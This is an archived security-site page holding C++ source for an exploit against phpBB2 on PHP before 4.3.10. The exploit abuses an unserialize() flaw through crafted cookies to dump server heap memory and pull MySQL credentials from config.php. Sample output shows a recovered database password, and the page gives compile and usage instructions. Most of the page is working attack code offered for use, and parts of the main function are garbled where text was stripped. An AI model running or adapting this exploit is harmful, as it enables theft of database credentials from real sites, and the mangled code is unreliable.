TUCoPS :: Web BBS :: Frequently Exploited :: hack7413.htm

phphpbb2 + php version < 4.3.10 unserialize() memory dump sql password from config.php exploit
phphpbb2 + php version < 4.3.10 unserialize() memory dump sql password from config.php exploit



php bug in ext/standart/var_unserializer.c in php < 4.3.10

for dump php heap memory with phpbb2 ,who use unserialize() for cookie , and found the config.php(sql password) in the heap.



you need http://overdose.tcpteam.org/serv.h and http://overdose.tcpteam.org/serv.cpp for compile 





/*

	*** coded by overdose ***

slythers@gmail.com 

	php bug in ext/standart/var_unserializer.c http://www.securityfocus.com/archive/1/384663/2004-12-13/2004-12-19 /0

	for read heap memorie with phpbb2 ;>

tested : phpbbmemorydump.exe "http://site.com/phpbb/" 30000 -cookiename=phpbb2support > a.txt

	result:

		- string detected : /home/virtual/site.com/phpBB/config.php

		- string detected : dbname

		- string detected : PT_N

		- string detected : phpbb

		- string detected : dbuser

		- string detected : phpbb  << mysql user

		- string detected : dbpasswd

		- string detected : phpBB_R0cKs << mysql password

		- string detected : table_prefix

		- string detected : phpbb_

	use like :

		phpbbmemorydump.exe "http://site.com/phpbb2/" nboctettoreadinheap [repeat/display_all_heap] [-cookiename=phpbb2mysql]

	greetz:

	my crew MWA

	pull the plug , vortex challenge

www.security-challenge.com 

http://overdose.tcpteam.org/ 

	slipknot , dr dre , ...

	all #s-c and all i forget

	compile with borland c++ (freecommandlinetools) :

		bcc32 -c serv.cpp

		bcc32 bbmemorydump.cpp serv.obj

*/



#include 

#include 

#include "serv.h"



#define HTTP_PORT 80

#define SIGNATURE_REQUEST signaturequete

#define SIGNATURE_REQUEST_START "\nSet-Cookie: "

#define DEFAULT_COOKIE_NAME "phpbb2mysql"

#define END_SIGNATURE "_data="

#define MIN_NB_LETTRE 3

#define NB_SEC_FOR_WAIT 1000*5 // 5 secondes



char signaturequete[512];



struct url{

	char *dns;

	char *uri;

	unsigned short port;

};



struct url parseurl(char *of);

char * intostr(int erf);

bool goodcar(char carac);

unsigned int utf8decode(char *utf);

char alphanum(char *of,bool *wesh);



int main(int argc,char **argv)

{

	struct url urlparsed;

	serveur http;

	unsigned int nbmemread;

	char car;

	bool repeat = 0;

	bool displayheap = 0;

	char *cookname = DEFAULT_COOKIE_NAME;

	WSAData wsadata;

	if (WSAStartup(MAKEWORD(2, 0),&wsadata) != 0)

		return 1;

	cout <<"coded by overdose / bad boyz coding"<\"http://site.com/phpbb2/\" nboctettoreadinheap [repeat/display_all_heap] [-cookiename=phpbb2mysql]"<= (nbmemread*3)))

					{

						exit = 1;

						continue;

					};

					word[cptstr] = car;

					cptstr++;

					word[cptstr] ='\0';

				};

				if(displayheap)

					cout << word< MIN_NB_LETTRE )

					{

						wtmp = new char[(cpt - compteur)+1];

						strncpy(wtmp,&word[compteur],cpt - compteur);

						wtmp[cpt - compteur] = '\0';

						cout <<"- string detected : " <= 0)

	{

		puissance =0;

		for(int kekette = 1;kekette<=erf;kekette = kekette*10)

		{

			puissance++;

		};

		if (puissance == 0)

		{

			puissance = 1;

		};

		chaine = new char[puissance+1];

		chaine[puissance] ='\0';

		for(int arf = puissance-1;arf >=0;arf--)

		{

			erf2 = erf % 10 ;

			chaine[arf] = '0' + erf2;

			erf = erf /10;

		};

		return chaine;

	}

	else

		return 0;

}



bool goodcar(char carac)

{

	unsigned short cpt;

	if(!carac)

		return 0;

	// i hate do like this :/

	char *goodcar = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMONPQRSTUVWXYZ012345689<>é@à)]=}è[_-{#&*\\/-+~'ç$%.:;|^~$,!?\"\'\t\r\n "; 

	for(cpt = 0;(goodcar[cpt] != '\0') && (goodcar[cpt] != carac);cpt++);

	if(goodcar[cpt] == carac)

		return 1;

	return 0;

}



unsigned int utf8decode(char *utf)

{

	char *r;

	char *w;

	char tmp;

	bool han;

	r = w = utf;

	while(*r)

	{

		if(*r =='%')

		{

			tmp = alphanum(r+1,&han);

			if(han)

			{

				*w = tmp;

				r += 2;

			}

			else

				*w = *r;

		}

		else

			*w = *r;

		w++;

		r++;

	};

	*w = '\0';

	return (w-utf);

}



char alphanum(char *of,bool *wesh)

{

	unsigned char retour;

	retour = 0x00;

	*wesh = 0;

	if(!(*of && *(of+1)))

		return 0x00;

	if((*of >= 'a') && (*of <= 'f'))

		retour = ((*of - 'a') +10) * 0x10;

	else if((*of >= 'A') && (*of <= 'F'))

		retour = ((*of - 'A') +10) * 0x10;

	else if((*of >= '0') && (*of <= '9'))

		retour = (*of - '0') * 0x10;

	else

		return 0x00;

	of++;

	if((*of >= 'a') && (*of <= 'f'))

		retour += ((*of - 'a') +10);

	else if((*of >= 'A') && (*of <= 'F'))

		retour += ((*of - 'A') +10);

	else if((*of >= '0') && (*of <= '9'))

		retour += (*of - '0');

	else

		return 0x00;

	*wesh = 1;

	return retour;

}

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH